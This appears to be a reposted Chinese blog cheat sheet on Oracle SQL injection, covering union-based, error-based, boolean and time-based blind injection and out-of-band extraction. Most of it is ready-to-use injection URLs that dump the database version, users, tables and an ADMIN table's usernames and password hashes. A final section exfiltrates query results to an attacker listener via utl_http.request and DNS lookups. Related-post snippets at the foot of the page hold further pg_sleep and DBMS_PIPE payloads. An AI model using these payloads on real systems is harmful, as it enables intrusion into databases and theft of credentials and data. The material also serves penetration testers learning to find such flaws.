看了这个,谁还怕Oracle注入?

最新推荐文章于 2024-05-14 08:53:38 发布
最新推荐文章于 2024-05-14 08:53:38 发布
阅读量1.6k 收藏 5
点赞数 1
分类专栏: SQL注入

https://www.secquan.org/Prime/1069599

https://mp.weixin.qq.com/s/MYkvQDpYZbz67F6qK9Ri0g

微信可能图片不能直接显示,我也木得办法 ~ Mark一下 ~

目录

1. Oracle联合注入总结

2. Oracle报错注入总结

3. Oracle基于布尔的盲注总结

4. Oracle基于延时的盲注总结

5. Oracle注入之带外通信

 

 

1. Oracle联合注入总结

Oracle常规联合注入
Oracle Database,又名Oracle RDBMS,或简称Oracle。是甲骨文公司的一款关系数据库管理系统。

Oracle对于MYSQL、MSSQL来说意味着更大的数据量,更大的权限。

oracle注入中需要注意的一些小点:

  • Oracle 在使用union 查询的跟Mysql不一样Mysql里面我用1,2,3,4就能占位,而在Oracle里面有比较严格的类型要求。也就是说你union select的要和前面的字段类型一样,我们可以用null来代替站位。

  • Oracle和mysql不一样,分页中没有limit,而是使用三层查询嵌套的方式实现分页(查询第一条数据“>=0<=1”)

    例如: SELECT * FROM ( SELECT A.*, ROWNUM RN FROM (select * from session_roles) A WHERE ROWNUM <= 1 ) WHERE RN >=0

 

  • Oracle的单行注释符号是--,多行注释符号/**/。

        依旧提交order by 去猜测显示当前页面所用的SQL查询了多少个字段,也就是确认查询字段数。

http://www.jsporcle.com/a.jsp?username=SMITH%27%20order%20by%208%20--

http://www.jsporcle.com/a.jsp?username=SMITH%27%20union%20select%20null,null,null,null,null,null,null,null%20from%20dual%20--

 

  • 爆数据库版本

http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null from dual --

 

  • 其他查询信息语句:

当前用户权限 (select * from sessionroles)

当前数据库版本 ( select banner from sys.v$version where rownum=1)

服务器出口IP (用utl_http.request 可以实现)

服务器监听IP (select utl_inaddr.get_host_address from dual)

服务器操作系统 (select member from v$logfile where rownum=1)

服务器sid (select instance_name from v$instance)

当前连接用户 (select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)

当前用户 (SELECT user FROM dual)

 

爆库名:

http://www.jsporcle.com/a.jsp?username=SMITH' union  select null,null,(select owner from all_tables where rownum=1),null,null,null,null,null from dual --

http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select owner from all_tables where rownum=1 and owner <>'SYS' ),null,null,null,null,null from dual --

 

 

 

  • 爆表: ##### 表 一定要是大写的

    #######查询第一个表

http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select table_name from user_tables where rownum=1),null,null,null,null,null from dual --

 

  • 爆列 ##### 查询 表 ADMIN第一个列

http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and rownum=1),null,null,null,null,null,null from dual --

    第二个列#

http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and rownum=1),null,null,null,null,null,null from dual --

 

    查询表ADMIN 第三个列#

http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and column_name<>'USERNAME' and rownum=1),null,null,null,null,null,null from dual --

查询出来列有ID USERNAME PASSWORD#

 

  • 爆数据

  • http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(SELECT CONCAT(USERNAME,PASSWORD) FROM ADMIN),null,null,null,null,null,null from dual -- http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(SELECT USERNAME FROM ADMIN),(SELECT PASSWORD FROM ADMIN),null,null,null,null,null from dual --

 

一些常用的查询语句:

当前用户:SELECT user FROM dual;

列出所有用户:SELECT username FROM all_users ORDER BY username;

列出数据库:SELECT DISTINCT owner FROM all_tables;列出表名:SELECT table_name FROM all_tables;SELECT owner, table_name FROM all_tables;

查询表所有列:SELECT column_name FROM all_tab_columns WHERE TABLE_NAME='ADMIN';

定位文件:SELECT name FROM V$DATAFILE;

 

2. Oracle报错注入总结

 

  • 前言
    在oracle注入时候出现了数据库报错信息,可以优先选择报错注入,使用报错的方式将查询数据的结果带出到错误页面中。

    使用报错注入需要使用类似 1=[报错语句],1>[报错语句],使用比较运算符,这样的方式进行报错注入(MYSQL仅使用函数报错即可),类似mssql报错注入的方式。

     

  • 判断注入

http://www.jsporcle.com/news.jsp?id=1 and (select count (*) from user_tables)>0 --http://www.jsporcle.com/news.jsp?id=1 and (select count (*) from dual)>0 --


 

0x01 报错函数注入

  • utl_inaddr.get_host_name() 进行报错注入

and 1=utl_inaddr.get_host_name((select user from dual))-- http://www.jsporcle.com/news.jsp?id=1 and 1=utl_inaddr.get_host_name((select user from dual))--

utl_inaddr.get_host_address 本意是获取ip 地址,但是如果传递参数无法得到解析就会返回一个oracle 错误并显示传递的参数。

 

我们传递的是一个sql 语句所以返回的就是语句执行的结果。oracle 在启动之后,把一些系统变量都放置到一些特定的视图当中,可以利用这些视图获得想要的东西。

 

通常非常重要的信息有:

  • ctxsys.drithsx.sn()进行报错注入

  • http://www.jsporcle.com/news.jsp?id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual)) --

 

 

XMLType()进行报错注入

and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null --

http://www.jsporcle.com/news.jsp?id=1 and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select user from dual)%7c%7cchr(62))) from dual) is not null --

 

  • dbms_xdb_version.checkin()进行报错注入

    查询版本信息

  • and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null --

  • http://www.jsporcle.com/news.jsp?id=1 and (select dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) from dual) is not null --

 

 

  • bms_xdb_version.makeversioned()进报错注入

  • and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null --

  • dbms_xdb_version.uncheckout()进行报错注入

  • and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null --

  • dbms_utility.sqlid_to_sqlhash()进行报错注入

and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null --

 

  • ordsys.ord_dicom.getmappingxpath()进行报错注入

and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)--

decode进行报错注入#

 

这种方式更偏向布尔型注入,因为这种方式并不会通过报错把查询结果回显回来,仅是用来作为页面的表现不同的判断方法。

and 1=(select decode(substr(user,1,1),'S',(1/0),0) from dual) --

 

0x02 报错函数注入数据


Oracle 数据库的注入不同于其他数据库,如Access 和Mysql,它包含了几个系统表,这几个系统表里存储了系统数据库的表名和列名,如user_tab_columns,all_tab_columns,all_tables,user_tables 系统表就存储了用户的所有的表、列名,其中table_name 表示的是系统里的表名,column_name 里的是系统里存在的列名

 

  • 爆库 第一行记录

  • http://www.jsporcle.com/news.jsp?id=1 and 1=utl_inaddr.get_host_name((select (SELECT DISTINCT owner FROM all_tables where rownum=1) from dual))--

 

  • 爆表 第一行第一个记录

http://www.jsporcle.com/news.jsp?id=1 and 1=utl_inaddr.get_host_name((select table_name from user_tables where rownum=1)) --


 

第二个记录

http://www.jsporcle.com/news.jsp?id=1 and 1=utl_inaddr.get_host_name((select table_name from user_tables where rownum=1 and table_name not in ('LOGMNR_SESSION_EVOLVE$'))) --

 

 

报错admin表的 用户和密码

http://www.jsporcle.com/news.jsp?id=1 and 1=utl_inaddr.get_host_name((select (select username%7c%7cpassword from admin)from dual))--

 

 

其他报错函数大同小异。

 

 

 

3. Oracle基于布尔的盲注总结

 

0x01 decode 函数布尔盲注

decode(字段或字段的运算,值1,值2,值3)

这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回3

当然值1,值2,值3也可以是表达式,这个函数使得某些sql语句简单了许多


使用方法:

    比较大小

select decode(sign(变量1-变量2),-1,变量1,变量2) from dual; --取较小值

sign()函数根据某个值是0、正数还是负数,分别返回0、1、-1

 

例如:
变量1=10,变量2=20
则sign(变量1-变量2)返回-1,decode解码结果为“变量1”,达到了取较小值的目的。

SQL> select decode(sign(10-20),-1,10,20) from dual;DECODE(SIGN(10-20),-1,10,20)----------------------------                          10
 

注入点中decode盲注应用#

  • 判断是否是SCOTT用户

http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(user,'SCOTT',1,0) from dual) --

  • 当前也可以用字符逐个猜解,利用到substr()函数

http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --

 


 

这里只需要替换我们需要查的内容即可 不一一列举了,比如查询Oracle版本,判断版本的字符串第一个字符是否是O

http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(substr((select banner from sys.v_$version where rownum=1),1,1),'O',1,0) from dual) --

获取当前用户(select user from dual)
获取当前版本
(select banner from sys.v_$version where rownum=1)获取当前admin表的帐号和密码
(select username||password from admin)获取字符长度
select length(user) from dual --

select * from art where id=1 and 6=(select length(user) from dual) --

http://www.jsporcle.com/news.jsp?id=1 and 6=(select length(user) from dual) --

 


当前用户第一个字母的是否等于S 等于返回1否则返回0

(select decode(substr(user,1,1),'S',1,0) from dual) --

(select decode(substr(user,2,1),'Y',1,0) from dual) --

(select decode(substr(user,3,1),'S',1,0) from dual) --

(select decode(substr(user,4,1),'T',1,0) from dual) --

(select decode(substr(user,5,1),'E',1,0) from dual) --

(select decode(substr(user,6,1),'N',1,0) from dual) --

  • 测试当前用户语句

http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --

  • 获取当前admin表的帐号和密码

select * from art where id=1 and 1=(select decode(substr((select username||password from admin),1,1),'a',1,0) from dual)http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr((select username%7c%7cpassword from admin),1,1),'a',1,0) from dual)

 

  • 判断字符的字符

abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.

 

查询第二个的时候

http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr((select username%7c%7cpassword from admin),2,1),'d',1,0) from dual) --

  • 大概知道这些函数的用法 跑脚本爆破即可 burpsuite为例


0x02 instr函数布尔盲注
instr函数的使用,从一个字符串中查找指定子串的位置。例如:

 

 

 


从1开始算 d排第四所以返回4

盲注中的应用:

http://www.jsporcle.com/news.jsp?id=1 and 1=(instr((select user from dual),'SYS')) --

  • BURP爆破用户名


0x03 通用盲注方法 逐字猜解
先获取数据长度

37=(select length(username||password) from admin)

  • 转码测



     

http://www.jsporcle.com/news.jsp?id=1 and 37=(select length(username%7c%7cpassword) from admin)-- 

select * from art where id=1 and 37=(select length(username||password) from admin);

  • 猜解ascii码

  •  
 

http://www.jsporcle.com/news.jsp?id=1 and (select ascii(substr(username%7c%7cpassword,1,1)) from admin)=97 --

  • 同样 burp或脚本爆破即可

#

猜解结果: admine10adc3949ba59abbe56e057f20f883e

 

4. Oracle基于延时的盲注总结

 

0x00 前言
oracle注入中可以通过页面响应的状态,这里指的是响应时间,通过这种方式判断SQL是否被执行的方式,便是时间盲注;

 

oracle的时间盲注通常使用DBMS_PIPE.RECEIVE_MESSAGE(),而另外一种便是decode()与高耗时SQL操作的组合,当然也可以是case,if 等方式与高耗时操作的组合,这里的高耗时操作指的是,例如:(select count(*) from all_objects),对数据库中大量数据进行查询或其他处理的操作,这样的操作会耗费较多的时间,然后通过这个方式来获取数据。这种方式也适用于其他数据库。

  • 0x01 DBMS_PIPE.RECEIVE_MESSAGE()函数延时盲注
    DBMS_LOCK.SLEEP()函数可以让一个过程休眠很多秒,但使用该函数存在许多限制。

    首先,不能直接将该函数注入子查询中,因为Oracle不支持堆叠查询(stacked query)。其次,只有数据库管理员才能使用DBMS_LOCK包。

    在Oracle PL/SQL中有一种更好的办法,可以使用下面的指令以内联方式注入延迟:

    dbms_pipe.receive_message('RDS', 10)
    DBMS_PIPE.RECEIVE_MESSAGE函数将为从RDS管道返回的数据等待10秒。默认情况下,允许以public权限执行该包。DBMS_LOCK.SLEEP()与之相反,它是一个可以用在SQL语句中的函数。

  • 延迟盲注中的应用:

    http://www.jsporcle.com/news.jsp?id=-1 or 1= dbms_pipe.receive_message('RDS', 10)--
    http://www.jsporcle.com/news.jsp?id=1 and 1=dbms_pipe.receive_message('RDS', 10)--

 

如果页面延时10秒返回,即存在注入。

来自官网的DBMS_PIPE.RECEIVE_MESSAGE语法:

 

DBMS_PIPE.RECEIVE_MESSAGE ( pipename IN VARCHAR2, timeout IN INTEGER DEFAULT maxwait)RETURN INTEGER;

可以暂时理解成DBMS_PIPE.RECEIVE_MESSAGE('任意值',延迟时间)#

  • 0x02 decode函数延时盲注
    decode不仅可以在布尔盲注中运用,也可以用在延迟盲注中。

    在decode注入里加入延时语句。这里加入了我们的dbms_pipe.receive_message函数。

  • and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',10),0) from dual) -- http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',5),0) from dual)

 


 

当然,这里延迟的操作不一定用延迟函数,也可以使用花费更多时间去查询所有数据库的条目。例如:

(select count(*) from all_objects)http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr(user,1,1),'S',(select count(*) from all_objects),0) from dual) and '1'='1'

 

  • 通过这种明显时间差也能判断注入表达式的结果。

 

 

5. Oracle注入之带外通信

 

  • Oracle注入之带外通信和DNSLOG注入非常相似,例如和mysql中load_file()函数实现无回显注入非常相似。

    下面介绍这个技术中常用的函数和使用。

    环境这里准备两台测试,一台注入点的靶机,一台接受回显数据的平台。

     

接受的数据的靶机:   nc -vvlp 2008

 

0x01 utl_http.request()函数


通过utl_http.request我们可以将查询的结果发送到远程服务器上,在遇到盲注时非常有用,要使用该方法用户需要有utl_http访问网络的权限。

  • 检测是否支持utl_http.request
    utl_http.request 页面正常 支持

  • http://www.jsporcle.com/news.jsp?id=1 and exists (select count(*) from all_objects where object_name='UTL_HTTP') --

  • 反弹注入命令

and utl_http.request('http://域名或者ip:端口/'||(注入的语句))=1 --

注意|| 注意转码%7C%7C#

例如这里使用

select banner from sys.v_$version where rownum=1查询oracle数据库版本指纹 http://www.jsporcle.com/news.jsp?id=1 and utl_http.request('http://192.168.5.28:2019/'||(select banner from sys.v_$version where rownum=1))=1--

 

  •  
 

GET /Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Productio n HTTP/1.1

  • 查看当前连接用户 select SYS_CONTEXT ('USERENV', 'CURRENT_USER')from dual



     
  •  
 

http://www.jsporcle.com/news.jsp?id=1 and utl_http.request('http://192.168.5.28:2019/'%7C%7C(select SYS_CONTEXT ('USERENV', 'CURRENT_USER')from dual))=1 --

  • 查询系统用户

 

 

http://www.jsporcle.com/news.jsp?id=1 and%20 utl_http.request('http://192.168.5.28:2019/'%7c%7c (select user from dual))=1--

http://www.jsporcle.com/news.jsp?id=1 and%20 utl_http.request('http://192.168.5.28:2019/'%7c%7c(select member from v$logfile where rownum=1))=1--http://www.jsporcle.com/news.jsp?id=1%20and%20%20utl_http.request(%27http://192.168.5.28:2019/%27%7c%7c(select%20instance_name%20from%20v$instance))=1--

 

  • 查询admin的帐号和密码

http://www.jsporcle.com/news.jsp?id=1 and utl_http.request('http://192.168.5.28:2019/'%7c%7c(select username%7c%7cpassword from admin))=1 --

以下是常用的一些命令。#

当前用户权限 (select * from session_roles)当前数据库版本 ( select banner from sys.v_$version where rownum=1)服务器出口IP (用utl_http.request 可以实现)服务器监听IP (select utl_inaddr.get_host_address from dual)服务器操作系统 (select member from v$logfile where rownum=1)服务器sid ( 远程连接的话需要, select instance_name fromv$instance;)当前连接用户 (select SYS_CONTEXT ('USERENV', 'CURRENT_USER')from dual)
 

  • 0x02 utl_inaddr.get_host_address()函数

and (select utl_inaddr.get_host_address((select user fromdual)||'.aaa.com(自己搭建dnslog)') from dual)is not null --

 

  • 0x03 SYS.DBMS_LDAP.INIT()函数

and (select SYS.DBMS_LDAP.INIT((select user from dual)||'.aaaa.com(自己搭建dnslog)') from dual)is not null --

 

三种函数用法效果大同小异,具体视情况使用即可。#

 

PD_3569
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
linux nginx 日志位置,mac nginx 日志位置
weixin_42549117的博客
05-02 1210
xsjyBldb • 2021-03-27 07:44''||(select 1 from (select pg_sleep(15))x)||''xsjyBldb • 2021-03-27 07:44'||(select 1 from (select pg_sleep(15))x)||'xsjyBldb • 2021-03-27 07:44'||DBMS_PIPE.RECEIVE_MESSA...
Oracle注入
秋水的博客
09-03 6475
Oracle数据库 Oracle数据库也是一种关系数据库,此数据库体量较大,一般与jsp网站联合 既然是关系数据库,肯定也是存在一些关系表,在Oracle数据库中,库的概念被淡化,强调用户 Oracle注入之联合查询 注入原理 其注入原理与MySQL一致,都是基于回显的注入,通过union all select来获取我们想要的数据 引入知识 dual表,此表是Oracle数...
14-Web安全——基于Oracle的联合注入,报错注入,盲注
网络安全
07-16 1196
目录 1. 基于ORACLE的sql注入 2. 联合注入 3. 报错注入 1. 基于ORACLE的sql注入 ORACLE是一个关系型数据库,一般会在用户下面生成自己的数据库表,它没有数据库的概念,每个登陆的用户都会有属于自己独立的数据库,不同用户看到的数据库表也不同。 举个例子,如果使用不同用户登陆ORACLE数据库的话,就会看到属于当前用户的数据库: 例如,如果使用ORACLE的系统管理员system用户登陆会看到很多的数据库表,并且这些数据库表只有在登陆system...
2024年Go最新干货 Oracle注入和漏洞利用姿势总结,统统都会
最新发布
qq_38197819的博客
05-14 451
Oracle 8i 开始,Oracle Database 允许在数据库中存储和执行 Java,并提供了 Java 池,用于存放 Java 代码、Java 语句的语法分析表、Java 语句的执行方案和 Java 虚拟机中的数据,以便进行 Java 程序开发。在实际利用中,如果我们获取了 Oracle 管理员级别的用户凭据,可以通过 DBMS_SCHEDULER 包中存储过程创建程序/作业对象,来调度操作系统的可执行文件或脚本,从而执行系统命令。此外,还需要数据库服务器可以出网。
Oracle的getshell命令执行的实战(有版本限制)
weixin_50464560的博客
02-05 5236
文章中涉及到的漏洞均已提交,渗透测试需规范!这是个人认为近期比较有价值的一次渗透测试,分享给大家。主要分为4个步骤:弱口令进入系统;后台sql注入;getshell,远程RDP管理员登录;扩大战果,证明危害。0x01 弱口令在一次针对某站点信息收集的过程中,通过子域名扫描,扫描到某个老旧系统。一看这都2014年的老站了,肯定有搞头!日常使用burp爆破一波试试,没爆破出来但是随手一试,好家伙123/123进入系统,属于是运气拉满了(高强度打码)这里能看到是一个“编辑”人员的权限,并没有什么上传等后台管理的功
Oracle也有注入漏洞
09-11
Oracle也有注入漏洞
谁在抛弃ORACLE?.pdf
10-10
【标题】:“谁在抛弃ORACLE?”探讨了ORACLE公司在华面临的挑战,主要涉及市场策略、员工关系和管理问题。 【描述】:文章指出,ORACLE中国区的一些高层管理者,如张书恒,以及多名中层管理者相继离职,他们离职的...
ORACLE数据库手工注入详解.doc
04-08
ORACLE数据库手工注入详解
Oracle数据库SQL注入手册1
08-08
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’
php二维数组根据键值返回,php二维数组根据指定键值重新排序
weixin_30571837的博客
04-09 431
:支持免登录发表评论12020-07-12 10:15:07 回复:支持免登录发表评论2021-03-08 19:53:56 回复:请先登录后回复评论2021-03-08 19:54:12 回复:请先登录后回复评论2021-03-08 19:54:18 回复:支持免登录发表评论2021-03-08 20:04:13 回复:支持免登录发表评论2021-03-08 20:04:14 回复:支持免登录发...
【转】sqlmap用户手册
weixin_33851177的博客
06-18 1243
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页...
浅谈盲注中的基于时间型和布尔型的注入方法
热门推荐
pygain的博客
11-08 2万+
SQL显错注入已经被用烂了像这种漏洞,漏洞批量发现工具找一找,sqlmap跑一跑。 今天讲的是在我们的命令被带入数据库查询语句但是却什么都没有返回的情况我们该怎么办。例如应用程序就会返回一个“通用的”的页面,或者重定向一个通用页面(可能为网站首页)。这时,我们之前学习的SQL注入办法就无法使用了。 盲注,即在SQL注入过程中,SQL语句执行选择后,选择的数据不能回显到前端,我们需要使用一些特殊的方法进行判断或尝试,这个过程称为盲注
基于时间的盲注原理简介
m0_38103658的博客
08-30 6366
基于时间的盲注 盲注简介 盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。 盲注原理 盲注的本质就是猜解,在没有回显数据的情况下,我们只能靠‘感觉’来体会每次查询时一点点细微的差异,而这差异包括运行时间的差异和页面返回结果的差异。 对于基于布尔的盲注来说,我们可以构造一条注入语句来测试我们输入的布尔表...
Sql注入系列详解(一)---基于时间差的盲注
AI.PLAY
05-07 1万+
Sql 基于时间的盲注   基于的原理是,当对数据库进行查询操作,如果查询的条件不存在,语句执行的时间便是0.但往往语句执行的速度非常快,线程信息一闪而过,得到的执行时间基本为0. 例如: 于是sleep(N)这个语句在这种情况下起到了非常大的作用。  Select sleep(N)可以让此语句运行n秒钟。 但是如果查询语句的条件不存在,执行的时间便是0,利用该函数
access筛选末位数字为1或5_SQL注入第二章——access,mssql,oracle
weixin_39957835的博客
11-29 365
一、Access注入Access是轻量级数据库,特点是没有库,没有用户,单文件即可存储数据,在SQL注入时必须猜测表名和列名。Access只有联合注入和布尔盲注。1,联合注入http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=151 order by 1 http://127.0.0.1/Production/PRODUCT_DETAIL.asp?i...
sql注入-access数据库-总结
weixin_42109829的博客
12-15 1080
Access数据库 是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具 手工注入 判断注入点 1.这里采用墨者学院提供的SQL手工注入漏洞测试环境 http://219.153.49.228:40000/new_list.asp?id=1 2.判断注入点标准三连 ’ ~ and 1 ~ and 0 http://219.153.49.228:47744/new_list.asp?id=1' #页面报错 http://219.153.49.228:47744/ne
sqlmap使用_使用sqlmap结合dnslog快速注入
weixin_39962675的博客
12-09 445
0x01 起因实际项目中遇到一个oracle延时注入,需要获取数据,几十个库几百张表,等找到关键数据不知道要到哪天.测试支持带外请求于是想用使用sqlmap利用DNS进行OOB注入0x02 阿里云主机与DNS解析配置1.首先购买一个域名并且进行备案,然后还需要一台vps2.配置DNS解析创建DNS服务器ns1.cwkiller.top-->vps ip ns2.cwkiller.t...
oracle手动注入
kfjrlgagkogkhpa的博客
03-23 2145
1、首先判断是否存在注入点 and 1=1/and 1=2 2、然后在判断是什么类型数据库and (select count () from dual)>0** Ps:Dual为oracle的一个默认表 eg:http://xxx.xx.xx.xx:xxxx/new_list.php?id=1 and (select count () from dual)>0,正常则表示为Oracle数据库 3、判断列数order by 看页面是否正常显示 4、联合注入, union select null,n
Oracle注入和其他数据库注入的区别
05-26
另外,Oracle的权限控制比较严格,攻击者需要通过有限的权限来获取所需的数据,这也使得Oracle注入攻击更加困难。 此外,Oracle注入攻击还有一些独特的技巧和方法,如使用Oracle的错误消息来检测注入漏洞、使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值